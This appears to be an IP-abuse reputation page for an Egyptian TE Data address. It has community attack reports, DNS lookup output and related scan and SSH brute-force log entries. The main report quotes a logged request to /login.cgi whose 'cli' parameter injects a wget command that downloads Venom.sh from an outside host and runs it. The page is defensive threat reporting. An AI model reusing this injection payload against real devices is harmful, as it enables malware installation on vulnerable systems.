197.54.253.105

Basic Info

City: unknown

Region: unknown

Country: Egypt

Internet Service Provider: TE Data

Hostname: unknown

Organization: unknown

Usage Type: Fixed Line ISP

Comments:

Make a comment on this IP

Type	Details	Datetime
attackspam	1 attack on wget probes like: 197.54.253.105 - - [22/Dec/2019:11:31:22 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 21:37:19

Type

Details

Datetime

attackspam

1 attack on wget probes like:
197.54.253.105 - - [22/Dec/2019:11:31:22 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11

2019-12-23 21:37:19

Comments on same subnet:

IP	Type	Details	Datetime
197.54.253.49	attackspam	IP Ban Report : https://help-dysk.pl/wordpress-firewall-plugins/ip/197.54.253.49/ FR - 1H : (631) Protection Against DDoS WordPress plugin : "odzyskiwanie danych help-dysk" IP Address Ranges by Country : FR NAME ASN : ASN8452 IP : 197.54.253.49 CIDR : 197.54.224.0/19 PREFIX COUNT : 833 UNIQUE IP COUNT : 7610368 WYKRYTE ATAKI Z ASN8452 : 1H - 16 3H - 50 6H - 126 12H - 257 24H - 540 INFO : Port Scan TELNET Detected and Blocked by ADMIN - data recovery	2019-09-27 07:58:25

Type

Details

Datetime

197.54.253.49

attackspam

IP Ban Report : https://help-dysk.pl/wordpress-firewall-plugins/ip/197.54.253.49/ 
 FR - 1H : (631)  
 Protection Against DDoS WordPress plugin :  
 "odzyskiwanie danych help-dysk" 
 IP Address Ranges by Country : FR 
 NAME ASN : ASN8452 
 
 IP : 197.54.253.49 
 
 CIDR : 197.54.224.0/19 
 
 PREFIX COUNT : 833 
 
 UNIQUE IP COUNT : 7610368 
 
 
 WYKRYTE ATAKI Z ASN8452 :  
  1H - 16 
  3H - 50 
  6H - 126 
 12H - 257 
 24H - 540 
 
 INFO : Port Scan TELNET Detected and Blocked by ADMIN  - data recovery

2019-09-27 07:58:25

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 197.54.253.105
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3030
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;197.54.253.105.			IN	A

;; AUTHORITY SECTION:
.			574	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019122300 1800 900 604800 86400

;; Query time: 107 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Dec 23 21:37:15 CST 2019
;; MSG SIZE  rcvd: 118

Host info

105.253.54.197.in-addr.arpa domain name pointer host-197.54.253.105.tedata.net.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
105.253.54.197.in-addr.arpa	name = host-197.54.253.105.tedata.net.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
45.143.220.59	attackbotsspam	45.143.220.59 was recorded 5 times by 2 hosts attempting to connect to the following ports: 5060. Incident counter (4h, 24h, all-time): 5, 30, 1507	2020-08-19 02:52:58
217.182.68.147	attack	Aug 18 15:33:06 pve1 sshd[15471]: Failed password for root from 217.182.68.147 port 58134 ssh2 ...	2020-08-19 02:53:43
62.138.14.110	attack	ET SCAN Sipvicious Scan - port: 5060 proto: sip cat: Attempted Information Leakbytes: 456	2020-08-19 02:48:41
220.132.86.17	attackbots	" "	2020-08-19 02:38:35
150.95.138.39	attackspambots	Aug 18 20:15:02 Ubuntu-1404-trusty-64-minimal sshd\[7404\]: Invalid user byp from 150.95.138.39 Aug 18 20:15:02 Ubuntu-1404-trusty-64-minimal sshd\[7404\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=150.95.138.39 Aug 18 20:15:04 Ubuntu-1404-trusty-64-minimal sshd\[7404\]: Failed password for invalid user byp from 150.95.138.39 port 38922 ssh2 Aug 18 20:19:51 Ubuntu-1404-trusty-64-minimal sshd\[10109\]: Invalid user deploy from 150.95.138.39 Aug 18 20:19:51 Ubuntu-1404-trusty-64-minimal sshd\[10109\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=150.95.138.39	2020-08-19 02:42:27
223.199.28.110	attackbots	Email rejected due to spam filtering	2020-08-19 03:05:46
209.17.97.34	attack	Auto Detect Rule! proto TCP (SYN), 209.17.97.34:53941->gjan.info:8080, len 44	2020-08-19 02:50:40
87.117.63.38	attackspambots	Unauthorized connection attempt from IP address 87.117.63.38 on Port 445(SMB)	2020-08-19 02:38:07
81.161.67.106	attackbotsspam	Unauthorized connection attempt IP: 81.161.67.106 Ports affected Message Submission (587) Abuse Confidence rating 54% ASN Details AS59479 GEMNET s.r.o. Czechia (CZ) CIDR 81.161.64.0/20 Log Date: 18/08/2020 11:52:01 AM UTC	2020-08-19 03:01:52
148.153.27.26	attackbotsspam	Unauthorized connection attempt from IP address 148.153.27.26 on Port 445(SMB)	2020-08-19 02:51:23
170.130.140.135	attack	Email rejected due to spam filtering	2020-08-19 03:04:20
149.202.164.82	attack	SSH auth scanning - multiple failed logins	2020-08-19 02:44:17
70.49.168.237	attackbots	Aug 18 20:36:03 vps639187 sshd\[18110\]: Invalid user msilva from 70.49.168.237 port 40174 Aug 18 20:36:03 vps639187 sshd\[18110\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=70.49.168.237 Aug 18 20:36:05 vps639187 sshd\[18110\]: Failed password for invalid user msilva from 70.49.168.237 port 40174 ssh2 ...	2020-08-19 02:45:14
95.140.19.34	attackbots	Unauthorized connection attempt from IP address 95.140.19.34 on Port 445(SMB)	2020-08-19 02:46:16
51.254.12.20	attackbots	IP: 51.254.12.20 Ports affected Simple Mail Transfer (25) Found in DNSBL('s) ASN Details AS16276 OVH SAS France (FR) CIDR 51.254.0.0/15 Log Date: 18/08/2020 11:08:14 AM UTC	2020-08-19 03:09:20

Recently Reported IPs

134.73.51.106	60.178.32.26	2a02:750:7::1f1	156.208.228.73
146.88.46.11	45.146.201.133	93.49.193.156	197.33.96.175
109.248.10.234	184.154.47.4	111.72.193.208	36.83.177.48
80.78.212.27	68.88.57.174	139.59.58.102	124.205.243.244
54.38.177.98	156.204.163.27	223.113.52.53	123.16.129.68